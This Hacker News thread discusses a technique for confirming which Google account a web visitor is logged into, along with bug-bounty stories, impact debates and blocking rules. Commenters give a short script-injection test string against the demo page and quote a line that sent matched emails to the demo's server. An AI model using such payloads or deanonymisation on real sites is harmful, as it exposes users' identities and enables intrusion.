
How to confirm a Google user’s specific email address - TomAnthony
http://www.tomanthony.co.uk/blog/confirm-google-users-email/
======
patorjk
> which allows an attacker to confirm whether a visitor to a web page is
> logged in to any one of a list of specific Google accounts

I actually reported a similar problem to Google that would allow you to do the
same thing back in 2013 (and like you, I used the load and onerror methods for
detection). I didn't get a reward either :/.

However, Facebook paid me $1,000 for finding this problem for a particular
area of their website ([http://patorjk.com/blog/2013/03/01/facebook-user-
identificat...](http://patorjk.com/blog/2013/03/01/facebook-user-
identification-bug/)). So I wouldn't write off this kind of security issue. It
seems to depend on who's giving out the bounty.

~~~
Merovius
Given that I regularly see my Facebook account name and photo on third party
websites, without giving them any permission to see those, I find it hard to
believe that Facebook cares about this…

~~~
patorjk
I agree with theGimp. From my experience they do seem to care about this. I
actually still carry the debt card they sent me in my wallet
([http://imgur.com/TuVKm5k](http://imgur.com/TuVKm5k)). Facebook also seems to
be the most generous in terms of giving out a reward. I ended up submitting a
few more issues after this and always got something reasonable (usually 1k to
1.5k).

------
michaelhoffman
This is an issue for those of us who do anonymous peer review of publications
that include references to the authors' web sites. It's bad enough that people
have tried to identify me just by location in their logs.

I recommend using Tor now. But most people won't.

~~~
nl
Tor won't help if you are logged into Google. The best solution here against
that problem is incognito mode plus a VPN.

~~~
michaelhoffman
I only use Tor for anonymous reviewing purposes so I don't log into Google
with it. But that's a good point.

~~~
djrogers
> I only use Tor for anonymous reviewing purposes so I don't log into Google
> with it

Not to get too pedantic, but Tor is a protocol, not a browser - if you use
your regular web browser over Tor, you’re still logged in.

On further thought, if you have only ever used a packaged ‘Tor browser’ that
is both a browser and implements the Tor protocol, then I can see where you’d
phrase it that way.

------
TomAnthony
Worth noting that this also works with GSuite email addresses.

Reddit user 'unsafeword' has suggested
([https://www.reddit.com/r/netsec/comments/6smdq0/how_to_confi...](https://www.reddit.com/r/netsec/comments/6smdq0/how_to_confirm_a_google_users_specific_email/))
that for organisations like schools/universities could use this for
identifying their own users, as the list isn't that large.

------
biftek
This seems like a handy way to confirm email addresses when a user signs up to
your service. If it returns false, send a regular "confirm your email" email.

~~~
spicyj
Not a great idea since it would require trusting the client unless I'm missing
something.

~~~
Retr0spectrum
It depends on why you're checking emails. If it's just for password recovery,
for example, then it's the user's loss if they intentionally use an invalid
email.

------
dpkonofa
Is this really even a big issue? For one, you have to already have knowledge
of the email address in advance. Then you have to somehow get this user to go
to a page that you have control over. Then you have to get them to wait around
on your page while you run through 1000 possible email addresses every 25
seconds. Unless this got onto a really, really compelling page, I don't think
anyone is going to sit around waiting for a page like this to do its business.
The chances of getting a successful match are so low that I can understand why
it's not a priority to fix this.

~~~
raldi
I could use this to make a website where, when an HN admin looked at it, it
looked great, but when anyone else did, it was full of ads, redirected to
malware, or whatever.

Reddit could use it to figure out whether various celebrities were redditors
and track what they look at. Even if they never log in! And if they _did_ log
in, reddit could find out what their username was.

And that's just what I was able to think up in 30 seconds.

~~~
dpkonofa
With your first example, you _could_ do that but it wouldn't be realistic to
do that. Like I said, you'd have to know the admin's logged in Google email
address already and then they'd have to sit on that page for over 2 hours
before you even hit a statistical probability of a match. It would really only
work if you were trying to target one specific person. If you were fishing for
users from a leak of users or something, this would literally do nothing.

As for the Reddit option, Reddit would already know if the celebrities were
redditors because they'd have to know their email address in advance anyways
for this trick to work. No celebrity is going to risk setting up a Reddit
account without an email address so Reddit already has that info. On top of
that, what's reddit going to do with a celebrity's email address and username?
It's already required for verification on anything important a celebrity would
use it for (like an AMA or promos).

Val Kilmer is a redditor. What exactly would I gain from knowing if Val Kilmer
is logged in to his Google account?

~~~
raldi
> they'd have to sit on that page for over 2 hours before you even hit a
> statistical probability of a match.

No, it would be instantaneous. If you have a specific email address in mind,
you test it, and immediately get "yes, it's them" / "no, it's not them" in
milliseconds.

> No celebrity is going to risk setting up a Reddit account without an email
> address

Huh? You don't think famous people have pseudonymous Internet accounts?

> Val Kilmer is a redditor. What exactly would I gain from knowing if Val
> Kilmer is logged in to his Google account?

"Val Kilmer's secret reddit username is i_love_horse_porn"

~~~
dpkonofa
>No, it would be instantaneous. If you have a specific email address in mind,
you test it, and immediately get "yes, it's them" / "no, it's not them" in
milliseconds.

Again...you'd already have to know the email address and what benefit does it
give you to know that this specific person is logged in? You'd have to somehow
get that specific person to visit your page in the first place.

>pseudonymous Internet accounts

I know they do. I just don't see what that gets me if I already know their
email address.

>i_love_horse_porn

The only people that would be able to gather this information from this
exploit are Reddit admins and they'd already have that information from the
email address. Even still... what would they even do with that information?

~~~
askmike
> Again...you'd already have to know the email address and what benefit does
> it give you to know that this specific person is logged in?

You can link users (that you target) to specific websites (that you indirectly
control, even through something like a malicious ad).

> The only people that would be able to gather this information from this
> exploit are Reddit admins and they'd already have that information from the
> email address. Even still... what would they even do with that information?

No! I (as a non admin) could create a website that uses this exploit right now
and link targets (like reddit admins of which I know the gmail) to my website.
Post the website to reddit, and voila. Once they visit the site I know they
did.

~~~
dpkonofa
And again, I ask... What information or benefit does that give you that you
didn't know before? This only works on specific people and targets that you've
had to identify before using this. I have yet to hear of a specific example of
this being used for nefarious purposes outside of confirming that someone
visited a page and there are hundreds of ways to do that without needing to
invoke this workaround.

~~~
askmike
Could you give me any other example of an exploit that allows an attacker to
tell that a specific gmail user is on a website?

------
leephillips
Yet another reason I'm glad I use uBlock Origin set to block all 3rd party
requests. To get the demo to work, I had to disable uBlock.

~~~
quakeguy
Even better to use Umatrix for browsing i think. You can enable several or all
elements on a site and so on. Use it with a hosts file like the one from:

someonewhocares.org

and you are even better off. imo.

------
jtokoph
Google can probably prevent the information leak via image tags by not using a
302 redirect and instead using a 200 response and a combination of <meta
refresh> and JS document.location.

This way, the image tag will always fire the onError

~~~
askmike
not that hard to replace the image with a function that does an ajax call and
checks response code.

~~~
twiss
You can't read the response of cross-origin ajax requests unless the response
specifically allows it (with CORS).

------
proactivesvcs
> 18th July – The team came back to me and asked me what my suggestions for
> handling this would be.

Surely they would make an offer of how much they would like to pay the OP
before they expect the OP to work for them?

------
robin_reala
Dead server, Google Cache is at
[https://webcache.googleusercontent.com/search?q=cache:http%3...](https://webcache.googleusercontent.com/search?q=cache:http%3A%2F%2Fwww.tomanthony.co.uk%2Fblog%2Fconfirm%2Dgoogle%2Dusers%2Demail%2F)

~~~
TomAnthony
Yeah, I was fiddling with the caching. Should be back now! Thanks! :)

------
seanalltogether
I'm trying to understand the implications here. Is the author suggesting that
real world attack would involve randomly generating email addresses to see if
they are valid or not based on whether they might match the current user. Or
would the attack involve purchasing a list known email addresses from
spammers, and then doing lookup against that list for every visitor that comes
to your website?

Option 1 seems like it would take impossibly long to match, and I'm not sure
what actionable information you get from option 2, other then maybe verifying
that the email address is still active?

~~~
stevep98
What about if I sent a proposal with my website to a bunch of investors that I
know, and I want to see which ones clicked on it.

~~~
Viper007Bond
You could also just use unique URLs (tracking, etc.).

------
chrisparton1991
This is neat, worked for me (I'm signed in to two Google accounts, both were
detected).

This is really neither here nor there, but your email input field isn't
escaped, so JS can be injected into the email field e.g. <script>alert('Hi
Tom!')</script>.

I enjoy the irony of a security-minded page having this issue, even though
there's no good reason for you to bother escaping the field :)

------
bkovacev
Off-topic, but shout out to Tom (author of the article) and Duncan @Distilled
for being great guys. I interviewed with them for a developer position few
years back, and while I usually forget the interviewers these two were
extremely nice. I didn't get the job, but they left a great impression. If
they're hiring in the RD department at Distilled make sure to apply!

------
Timshel
Those issues make
[https://wiki.mozilla.org/Security/Contextual_Identity_Projec...](https://wiki.mozilla.org/Security/Contextual_Identity_Project/Containers)
essential. I hope Mozilla will continue to improve the feature.

------
AndrewCHM

        ||accounts.google.com^$image,third-party
        ||google.com/accounts/*$image,third-party
    

For those that want to prevent the attack with ublocko, without filtering all
3rd party requests

------
hobarrera
Won't disabling third party cookies avoid this sort of issues?

------
royalharsh95
you cannot if you are using privacy badger.

------
yorick
Note that the demo sends your email address to the server if it's a hit.

$.ajax({ url: "/google_leak/save.php?info=manual_hit:" \+ email });

update: gone now. still pings that it ran. don't forget to hit ctrl-shift-r to
bypass your cache.

~~~
TomAnthony
Sorry - that was for debugging purposes and I forgot to remove it. I've
removed that and purged the log.

~~~
marksomnian
Thank you - I had assumed malice, glad I was proven wrong.

~~~
FRex
Still there for me..

~~~
TomAnthony
I assume it was cached for you. I did purge the CloudFlare cache when I made
the change, and only 2 more entries hit the log after that (which I also
cleared). :)

~~~
FRex
It's gone.

